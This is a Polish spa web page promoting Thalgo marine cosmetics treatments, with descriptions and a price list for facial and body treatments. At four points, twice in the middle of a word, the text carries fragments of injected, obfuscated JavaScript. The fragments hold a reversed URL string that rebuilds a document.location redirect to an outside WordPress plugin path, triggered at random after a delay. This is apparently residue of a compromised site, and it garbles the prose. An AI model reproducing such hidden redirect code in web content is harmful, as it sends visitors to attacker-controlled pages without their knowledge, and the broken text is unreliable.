Thalgo

Thalgo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to francuska firma będą liderem w dziedzinie SPA oraz thalasseoterapii. Kosmetyki firmy Thalgo bazują generalnie na działaniach morskiej wody, fauny i flory tworząc doskonale nawilżające kosmetyki. Zabiegi Thalgo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jedna z najbogatszych ofert zabiegów na świecie, w których skład wchodzi kilkanaście zabiegów na twarz np. maski morskie, maski kolagenowe oraz zabiegi hamujące starzenie się skór, a także zabiegi oczyszczające i intensywne zabiegi przeciwzmarszczkowe. Wśród zabiegów Thalgo odnajdziemy również całkowicie naturalne zabiegi np. z alg morskich.

Zabiegi Thalgo nie ograniczają się wyłącznie do zabiegów na twarz, ale również na całe ciało. W tym przypadku oferowane nam są zabiegi z brązowych alg morskich, zabiegi intensywnie modelujące o działaniu ujędrniającym i wyszczuplającym, a także zabiegi antycellulitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe. Zabiegi Thalgo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to również oczyszczenie ciała bazujące w 100% na algach morskich oraz zabiegi z zimnymi i ciepłymi kamieniami, które przywracają równowagę duchową, psychiczną oraz fizyczną. Dzięki zabiegom Thalgo, będziemy w stanie zmierzyć się z najbardziej klasycznymi problemami skóry takimi jak przesuszenie, przetłuszczenie, łuszczenie, zmarszczki oraz cellulit. Każdy zabieg wprowadza nas w naturalny morski świat, w którym każdy znajdzie coś dla siebie.

Zabiegi na twarz Thalgo

ZabiegCena
Purete cleancing treatment
(Oczyszczający zabieg młodzieżowy)
120
Re-balancing treatment
(Zabieg balansujący z mikronizowana algą)
120
Aquarelle
(Intensywny zabieg nawilżająco-energetyzujący do skóry szarej zmęczonej. Odpowiedni na problemy worków wodnych po oczami)
120
Beauty hydration ritual
(Zabieg nawilżająco upiększający)
120
Absolute hydration ritual
(Zabieg intensywnie nawilżający z kompleksem Seve Bleue)
200
Eye expert treatment
(Intensywny zabieg na okolice oczu)
100
Beauty softness ritual
(Zabieg do skóry wrażliwej z rozszerzonymi Naczynkami)
140
Marine softness ritual
(Intensywny zabieg do skóry wrażliwej
200
Beauty nutrition ritual
(Odżywczy zabieg dla skóry suchej odwodnionej)
140
Intensive nutrition ritual
(Regenerujący zabieg dla skóry suchej, odwodnionej)
200
Marine collagen treatment
(Głębokie nawilżenie i wygładzenie zmarszczek)
230
Hyaluronic marine treatment
(Wygładzenie i wypełnienie zmarszczek)
250
Silicium marine treatment
(Wypełnienie zmarszczek i efekt liftingu)
300
Clear expert treatment
(Zabieg rozjaśniająco-nawilżający z prowitaminą C)
250
M Ceutic
(Całkowita odbudowa i odmłodzenie skóry)
300

Zabiegi na ciało Thalgo

ZbiegCena
Frigi - thalgo wrap150
High - precision shapinig treatment200